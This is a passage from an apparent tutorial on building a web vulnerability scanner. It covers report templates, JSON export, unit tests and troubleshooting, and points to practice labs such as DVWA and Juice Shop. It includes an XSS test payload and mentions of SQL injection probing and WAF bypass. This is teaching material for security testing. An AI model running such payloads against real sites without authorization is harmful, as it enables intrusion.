.medium { background-color: #ffbb33; }
.low { background-color: #99cc00; }
.finding { border: 1px solid #ccc; margin: 10px; padding: 15px; }
</style>
</head>
<body>
<h1>Vulnerability Scan Report</h1>
<h2>Target: {{ target }}</h2>
<h2>Scan Date: {{ scan_date }}</h2>
<h3>Summary</h3>
<ul>
<li class="critical">Critical: {{ critical_count }}</li>
<li class="high">High: {{ high_count }}</li>
<li class="medium">Medium: {{ medium_count }}</li>
<li class="low">Low: {{ low_count }}</li>
</ul>
<h3>Findings</h3>
{% for vuln in vulnerabilities %}
<div class="finding {{ vuln.severity }}">
<h4>{{ vuln.vuln_type }}</h4>
<p><strong>URL:</strong> {{ vuln.url }}</p>
<p><strong>Parameter:</strong> {{ vuln.parameter }}</p>
<p><strong>Payload:</strong> <code>{{ vuln.payload }}</code></p>
<p><strong>Evidence:</strong> {{ vuln.evidence }}</p>
<p><strong>Recommendation:</strong> {{ vuln.recommendation }}</p>
</div>
{% endfor %}
</body>
</html>
''')
return template.render(
target=target,
scan_date=datetime.now().isoformat(),
vulnerabilities=vulnerabilities,
critical_count=sum(1 for v in vulnerabilities if v.severity == 'critical'),
high_count=sum(1 for v in vulnerabilities if v.severity == 'high'),
medium_count=sum(1 for v in vulnerabilities if v.severity == 'medium'),
low_count=sum(1 for v in vulnerabilities if v.severity == 'low'),
)
- JSON export for tool integration:
def export_json(vulnerabilities: List[Vulnerability], filepath: str): data = { 'scan_date': datetime.now().isoformat(), 'total_findings': len(vulnerabilities), 'findings': [asdict(v) for v in vulnerabilities] } with open(filepath, 'w') as f: json.dump(data, f, indent=2)
Testing Strategy
Testing Against Intentionally Vulnerable Applications
- DVWA (Damn Vulnerable Web Application)
- Test at โLowโ security level first
- Progress through Medium and High
- Your scanner should find SQLi and XSS at Low
- OWASP WebGoat
- Structured lessons for each vulnerability type
- Verify your scanner finds the intended vulnerabilities
- OWASP Juice Shop
- Modern JavaScript-heavy application
- Tests your crawlerโs ability to handle SPAs
Unit Testing Payloads
def test_sqli_payloads_detected():
# Test against known vulnerable responses
vulnerable_response = "You have an error in your SQL syntax"
assert is_sqli_error(vulnerable_response) == True
clean_response = "No products found"
assert is_sqli_error(clean_response) == False
def test_xss_reflection_detection():
html = '<input value="<script>alert(1)</script>">'
assert detect_xss_reflection(html, '<script>alert(1)</script>') == True
Common Pitfalls and Debugging
1. โFalse positives everywhereโ
Problem: Scanner reports vulnerabilities that arenโt real
Solutions:
- Verify by actually exploiting (does payload execute?)
- Add confidence scoring
- Require multiple indicators before reporting
- Filter out honeypot/WAF responses
2. โMissing obvious vulnerabilitiesโ
Problem: Known vulnerable app, scanner finds nothing
Debug steps:
- Is the crawler finding the vulnerable pages?
- Is the parameter being tested?
- Check if WAF is blocking payloads
- Try different payload encodings
3. โCrawler goes off-site or loops foreverโ
Problem: Crawler follows external links or revisits pages
Solutions:
- Strict domain checking
- Track visited URLs in a set
- Set maximum crawl depth
- Implement timeout per page
4. โXSS not detected even when payload reflectsโ
Problem: Payload in response but not marked as XSS
Debug steps:
- Is response HTML or JSON?
- Is payload HTML-encoded in response?
- Check if context detection is working
Extensions and Challenges
Beginner Extensions
- Add more payloads: Load from external files
- Progress reporting: Show real-time scan progress
- Proxy support: Route through Burp Suite
Intermediate Extensions
- JavaScript rendering: Use Selenium for SPAs
- CSRF detection: Check for missing tokens
- Session handling: Test with authenticated sessions
Advanced Extensions
- WAF bypass payloads: Encoding and obfuscation
- API fuzzing: REST/GraphQL vulnerability testing
- SSRF detection: With callback server
- Stored XSS: Re-check pages for persisted payloads
Real-World Connections
Commercial Scanners
Your project is a simplified version of:
- Burp Suite Pro - Industry standard web scanner
- OWASP ZAP - Open source alternative
- Nuclei - Template-based vulnerability scanner
After this project, study how these tools workโtheyโre built on the same concepts but with years of refinement.
Bug Bounty Application
These skills directly apply to bug bounty:
- Subdomain enumeration โ More attack surface
- Automated scanning โ Find low-hanging fruit
- Manual verification โ Avoid duplicate reports
- Report writing โ Get paid faster
Self-Assessment Checklist
Core Functionality
- Crawler discovers all pages and forms
- SQLi detection works (error-based and time-based)
- XSS detection works (reflected)
- Security headers are checked
- HTML report is generated
Code Quality
- Modular design (can add new modules easily)
- Error handling (doesnโt crash on edge cases)
- Configuration options (timeout, threads, etc.)
- CLI with โhelp
Understanding
- Can explain how SQL injection works at query level
- Understand difference between XSS contexts
- Know why parameterized queries prevent SQLi
- Understand OWASP Top 10 categories
Validation
- Finds vulnerabilities in DVWA (low security)
- Minimal false positives on clean application
- Report is professional quality
Resources
Primary Reading
- โBug Bounty Bootcampโ by Vickie Li - Chapters 6-12
- โThe Web Application Hackerโs Handbookโ by Stuttard & Pinto
- โHTTP: The Definitive Guideโ by David Gourley
Online Resources
- PortSwigger Web Security Academy - Free interactive labs
- OWASP Testing Guide
- PayloadsAllTheThings
Practice Environments
- DVWA -
docker run -p 80:80 vulnerables/web-dvwa - OWASP WebGoat -
docker run -p 8080:8080 webgoat/webgoat - OWASP Juice Shop -
docker run -p 3000:3000 bkimminich/juice-shop
This project is part of the Ethical Hacking & Penetration Testing learning path.